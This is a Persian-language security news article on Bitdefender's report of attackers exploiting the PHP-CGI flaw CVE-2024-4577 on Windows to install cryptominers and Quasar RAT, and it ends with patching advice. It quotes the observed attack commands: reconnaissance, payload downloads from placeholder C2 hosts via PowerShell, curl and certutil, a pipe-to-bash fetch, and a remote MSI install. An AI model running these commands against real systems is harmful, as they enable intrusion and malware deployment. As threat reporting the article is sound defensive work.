مهاجمان سایبری در حال اکسپلویت یک آسیبپذیری بحرانی در PHP برای توزیع ماینرهای ارز دیجیتال و تروجانهای دسترسی از راه دور (RAT) مانند Quasar RAT هستند.
این آسیبپذیری که با شناسه CVE-2024-4577 ثبت شده، یک آسیبپذیری تزریق پارامتر در PHP است که بر سیستمهای ویندوزی در حالت CGI تأثیر میگذارد و به مهاجمان از راه دور اجازه میدهد کدهای مخرب را اجرا کنند.
شرکت امنیت سایبری Bitdefender اعلام کرده که از اواخر سال 2024، شاهد افزایش شدید تلاشها برای اکسپلویت این آسیبپذیری بوده است. توزیع جغرافیایی حملات به این شکل گزارش شده است:
- تایوان: 54.65%
- هنگکنگ: 27.06%
- برزیل: 16.39%
- ژاپن: 1.57%
- هند: 0.33%
نحوه اکسپلویت آسیب پذیری PHP
حدود 15% از این تلاشها شامل بررسیهای اولیه آسیبپذیری با اجرای دستورات سادهای مانند “whoami” و “echo <test_string>” بودهاند.
15% دیگر نیز شامل دستورات برای جمعآوری اطلاعات سیستم، مانند فهرست پردازشها، کشف اطلاعات شبکه، جمعآوری اطلاعات کاربران و دامنهها و متادادههای سیستم بوده است. مهاجمان از تکنیکهای Living Off The Land (LOTL) برای شناسایی سیستم استفاده میکنند. بهرهگیری از ابزارهای خط فرمان داخلی ویندوز باعث میشود که شناسایی فعالیتهای مخرب دشوارتر شود. دستورات LOTL برای اهداف مختلف شناسایی سیستم مورد استفاده قرار میگیرند، از جمله:
فهرست پردازشهای در حال اجرا
مهاجمان از دستورات مانند tasklist.exe و wmic.exe برای شناسایی پردازشهای فعال استفاده میکنند تا نرمافزارهای امنیتی یا اهداف ارزشمند را شناسایی کنند.
cmd.exe /c "tasklist"
cmd.exe /c "tasklist /v /fo csv /nh
cmd.exe /s /c "wmic process get Caption,ProcessId,CommandLine"
cmd.exe /s /c "wmic process where name=php.exe get ProcessId,CommandLine"
cmd.exe /s /c "wmic path Win32_PerfFormattedData_PerfProc_Process get Name,IDProcess,PercentProcessorTime”
کشف اطلاعات شبکه
دستورات مانند netstat.exe یا netsh.exe برای تحلیل ارتباطات شبکه، شناسایی پورتهای باز و کانالهای ارتباطی احتمالی استفاده میشوند.
cmd.exe /s /c "netstat -ano | findstr :443"
cmd.exe /c "ipconfig /all"
cmd.exe /c "netsh firewall show config"
جمعآوری اطلاعات کاربران و دامنه
دستورات net.exe و nltest.exe برای شناسایی حسابهای کاربری، گروههای دارای دسترسی بالا و ارتباطات دامنه استفاده میشوند.
cmd.exe /c "net group "domain admins" /domain"
cmd.exe /s /c "net user"
cmd.exe /c "nltest /domain_trusts"
جمعآوری اطلاعات سیستم
دستورات systeminfo.exe و wmic.exe برای دریافت اطلاعات کلی درباره سیستم مورد استفاده قرار میگیرند.
cmd.exe /c "systeminfo"
cmd.exe /c "wmic os get OSArchitecture"
این تکنیکها به مهاجمان امکان میدهند بدون اجرای ابزارهای اضافی و مخرب، اطلاعات حساس سیستم را بهدست آورده و فعالیتهای خود را پنهان کنند.
در ادامه، Bitdefender اعلام کرده که دستکم 5% از حملات موفق، به استقرار ماینر XMRig ختم شدهاند.
استفاده از ماینر XMRig و روشهای توزیع آن توسط مهاجمان
مهاجمان معمولاً از درایور آسیبپذیر Winring0x64 برای مخفی کردن فعالیتهای XMRig استفاده میکنند. این درایور، در صورت اکسپلویت، به فرآیندهای مخرب اجازه میدهد با سطح دسترسی بالا اجرا شوند و از شناسایی توسط ابزارهای نظارت بر سیستم جلوگیری کنند. مهاجمان از روشهای مختلفی برای دانلود و اجرای XMRig استفاده میکنند، از جمله:
- دانلود درایورsys با PowerShell
cmd.exe /s /c \"powershell Invoke-WebRequest -Uri http://<C2_IP>/winrig.sys -OutFile winrig.sys\"
- دانلود همان درایور با curl
cmd.exe /s /c \"curl -o winrig.sys http://<C2_IP>/winrigs.sys\\"
- دانلود و اجرای ماینر از یک سرور کرهای با curl و bash
cmd.exe /s /c "curl -fsSL http://<C2_IP>:8080/Wuck/mq.txt |bash"
استفاده از ماینر Nicehash
مارتین زوگک، مدیر راهکارهای فنی در Bitdefender، بیان کرد که برخی از مهاجمان، از ماینرهای Nicehash نیز استفاده کردهاند. Nicehash یک پلتفرم است که به کاربران اجازه میدهد توان پردازشی خود را برای استخراج ارز دیجیتال بفروشند. در این حملات، ماینرها بهصورت برنامههای قانونی مانند javawindows.exe پنهان شدهاند تا از شناسایی توسط نرمافزارهای امنیتی جلوگیری کنند. یک نمونه از دستورات اجرا شده به شرح زیر است:
cmd.exe /c javawindows.exe -o <anonymized_mining_pool_IP> -u aa -p aa --tls --nicehash --cpu-no-yield --huge-pages-jit --randomx-mode=fast --background --algo=rx/0 -k
استقرار Quasar RAT
برخی دیگر از حملات، این نقص امنیتی را برای توزیع ابزارهای دسترسی از راه دور (RAT) مانند Quasar RAT مورد سوءاستفاده قرار دادهاند. Quasar RAT یک تروجان متنباز دسترسی از راه دور (RAT) است که به مهاجمان قابلیتهای متعددی مانند اجرای دستورات از راه دور، انتقال فایل، کیلاگینگ (ثبت کلیدهای فشردهشده) و ضبط صفحه نمایش را میدهد.
در این کمپین، Quasar با استفاده از اسکریپتهایBatch اجرا شده که این بدافزار را از سرورهای فرمان و کنترل (C2) دانلود میکنند. این اسکریپتها از ابزارهای داخلی ویندوز مانند powershell.exe و certutil.exe استفاده میکنند تا از شناسایی توسط نرمافزارهای امنیتی جلوگیری شود.
- استفاده از PowerShell برای دریافت و اجرای اسکریپت مخرب:
cmd.exe /s /c "powershell Invoke-WebRequest -Uri http://<C2_IP>/antivirus.cmd -OutFile antivirus.cmd”
- استفاده ازexe برای بارگیری RAT از سرور C2:
cmd.exe /s /c "certutil.exe -urlcache -split -f http://<C2_IP>/antivirus.cmd antivirus.cmd"
همچنین، مهاجمان از طریق cmd.exe، فایلهای نصبکننده مخرب ویندوز (MSI) را از سرورهای راه دور اجرا کردهاند. در این روش، یک فایل MSI مخرب از یک سرور C2 دانلود شده و اجرا میشود. این آدرس سرور قبلاً در فعالیتهای مربوط به باتنتها مشاهده شده که نشاندهنده تلاش مهاجمان برای افزودن سیستمهای آلوده به یک شبکه باتنت موجود است. استفاده از msiexec.exe برای نصب فایل مخرب:
cmd.exe /c \"msiexec /q /i http://<C2_IP>/5118.msi
رقابت بین مهاجمان سایبری
نکته جالب توجه در این حملات، مشاهده تلاشهایی برای تغییر تنظیمات فایروال سرورهای آسیبپذیر بوده است، به طوری که دسترسی به IPهای مخرب شناختهشده مسدود شده است. به عنوان نمونه در دستور زیر اتصالات خارجی به سرور oldschool[.]best بلاک میشود:
"cmd.exe /s /c "powershell New-NetFirewallRule -DisplayName BLOCK-OUT-<anonymized_IP> -Direction Outbound -Action Block -RemoteAddress <anonymized_IP> -Protocol Any -Verbose"
cmd.exe /s /c "powershell New-NetFirewallRule -DisplayName BLOCK-IN-<anonymized_IP> -Direction Inbound -Action Block -RemoteAddress <anonymized_IP> -Protocol Any -Verbose"
Bitdefender این رفتار غیرمعمول را نشانهای از رقابت بین گروههای سرقت رمزارز (Cryptojacking) میداند. این گروهها سعی دارند از منابع آسیبپذیر برای خودشان استفاده کرده و مانع دسترسی رقبا شوند. چنین رویکردی پیشتر نیز در حملات Cryptojacking مشاهده شده بود، جایی که بدافزارها قبل از استقرار، فرآیندهای ماینرهای رقیب را متوقف میکردند.
توصیههای امنیتی
کاربران به شدت توصیه میشود نسخه PHP خود را بهروز کنند تا از حملات احتمالی در امان بمانند. زوگک همچنین پیشنهاد کرد که سازمانها برای کاهش ریسک، استفاده از ابزارهای داخلی ویندوز، مانند PowerShell را فقط به کاربران دارای دسترسی سطح بالا محدود کنند.
همچنین IoCهای منتشر شده در این لینک موجود هستند.
